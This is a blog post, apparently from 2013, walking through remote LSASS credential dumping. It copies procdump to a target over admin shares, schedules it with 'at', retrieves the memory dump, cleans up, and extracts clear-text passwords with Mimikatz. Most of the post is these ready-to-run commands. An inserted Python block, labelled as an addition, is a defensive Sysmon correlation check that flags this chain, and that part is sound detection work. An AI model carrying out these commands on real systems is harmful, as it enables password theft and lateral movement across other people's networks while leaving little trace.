Using Mimikatz Alpha or Getting Clear Text Passwords with a Microsoft Tool
2013-06-13 11:22
Mimikatz is now built into Metasploit's Meterpreter: you can run "load mimikatz" from the meterpreter prompt. But if you don't want to go through the hassle of dealing with AV, reverse or bind payloads and Meterpreter binaries, and you already have clear text credentials for an admin, you can just use Mimikatz's alpha release, which lets you run Mimikatz on your own machine against a process memory dump of LSASS. The great thing about this technique is that the only thing on disk is a Microsoft tool.
Mimikatz Minidump: http://blog.gentilkiwi.com/securite/mimikatz/minidump
Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Let's start. First we make sure our authentication works against the box and that we can look inside C$ (usually only admins can):
net use \\TARGETBOX\C$ /user:DOMAIN\serviceaccount serviceaccount123
dir \\TARGETBOX\C$
If that works, we check that we can call the "AT" command on the remote host:
at \\TARGETBOX
All set. Next let's prep our workspace on the remote host. We are using the C:\Temp directory:
mkdir \\TARGETBOX\C$\Temp
dir \\TARGETBOX\C$\Temp
copy c:\temp\procdump.exe \\TARGETBOX\C$\
copy c:\temp\procdump.bat \\TARGETBOX\C$\
The contents of procdump.bat are:
@echo off
C:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also to help me notice when I've dumped more than one IP that is actually the same host.
Next we schedule the task. Use net time to determine the local time for the remote machine.
net time \\TARGETBOX
at \\TARGETBOX 13:52 C:\Temp\procdump.bat
Pull down the file and clean up:
dir \\TARGETBOX\C$\Temp
copy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\
rmdir /s \\TARGETBOX\C$\Temp
On your side, the only thing you need to make sure of is that you are running Mimikatz on a similar Windows version and architecture to the one you pulled the dump from. Use the following URL for reference: http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png
Load up the Alpha version of Mimikatz, switch it to minidump mode and you're dumping creds:
mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
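A defender-side view of the chain above, as an added example that is not part of the original post: a small correlation check that flags, on one host, the scheduled batch launch, the "procdump -ma lsass.exe" command line, the readable handle opened on lsass and the *_lsass.dmp file written to disk. The event layout, the allowlist and the taskeng.exe parent are assumptions about the log collector and the host baseline.

```python
import re
from collections import defaultdict

# Constructed sample events (not from the original post): flattened Sysmon
# ProcessCreate (1), ProcessAccess (10) and FileCreate (11) records for the
# target host plus a benign lsass access elsewhere. Field names are assumed.
SAMPLE_EVENTS = [
    {"ts": "2013-06-13T13:52:00", "host": "TARGETBOX", "id": 1,
     "parent": r"C:\Windows\System32\taskeng.exe", "cmdline": r'cmd /c "C:\Temp\procdump.bat"'},
    {"ts": "2013-06-13T13:52:01", "host": "TARGETBOX", "id": 1,
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\temp\procdump.exe -accepteula -ma lsass.exe TARGETBOX_lsass.dmp"},
    {"ts": "2013-06-13T13:52:01", "host": "TARGETBOX", "id": 10,
     "source_image": r"C:\temp\procdump.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1FFFFF"},
    {"ts": "2013-06-13T13:52:03", "host": "TARGETBOX", "id": 11,
     "target_filename": r"C:\Temp\TARGETBOX_lsass.dmp"},
    {"ts": "2013-06-13T13:55:00", "host": "WORKSTATION7", "id": 10,
     "source_image": r"C:\Windows\System32\svchost.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1000"},
]

# Images that legitimately open lsass on this (assumed) baseline.
LSASS_OPEN_ALLOWLIST = {r"c:\windows\system32\svchost.exe", r"c:\windows\system32\csrss.exe"}
PROCESS_VM_READ = 0x0010  # the access right any memory dump of lsass needs

def stage_of(ev):
    """Map one event to a stage of the scheduled procdump-of-LSASS chain, or None."""
    if ev["id"] == 1:
        if ev["parent"].lower().endswith("\\taskeng.exe") and ".bat" in ev["cmdline"].lower():
            return "scheduled_batch"   # at/schtasks job launching a batch file
        if re.search(r"-ma\b.*lsass", ev["cmdline"], re.I):
            return "procdump_lsass"    # full-memory dump of lsass requested
    elif ev["id"] == 10 and ev["target_image"].lower().endswith("\\lsass.exe"):
        if (ev["source_image"].lower() not in LSASS_OPEN_ALLOWLIST
                and int(ev["granted_access"], 16) & PROCESS_VM_READ):
            return "lsass_handle"      # readable handle on lsass from an unusual image
    elif ev["id"] == 11 and re.search(r"lsass.*\.dmp$", ev["target_filename"], re.I):
        return "lsass_dump_file"       # e.g. %COMPUTERNAME%_lsass.dmp written to disk
    return None

def correlate(events, min_stages=2):
    """Per host, the chain stages seen in time order; only hosts with >= min_stages."""
    seen = defaultdict(dict)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(ev)
        if stage:
            seen[ev["host"]].setdefault(stage, ev["ts"])  # keep first sighting
    return {h: sorted(s, key=s.get) for h, s in seen.items() if len(s) >= min_stages}
```

Requiring two or more stages on the same host keeps a lone ".dmp" file or a single unusual lsass open from paging anyone, while the full chain in the sample is reported with its stages in time order.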
That's it. Password dumping without ever using a "Hacker" tool on target. Much love, Microsoft. And even more to Mimikatz creator @gentilkiwi - Benjamin Delpy - for both this alpha release and for changing his licensing to allow Mimikatz code to be integrated into Meterpreter.
Rob Fuller
Reader Comments (1)
you can even create a minidump via PowerShell script =) https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
funny that the example given is the LSASS process ;)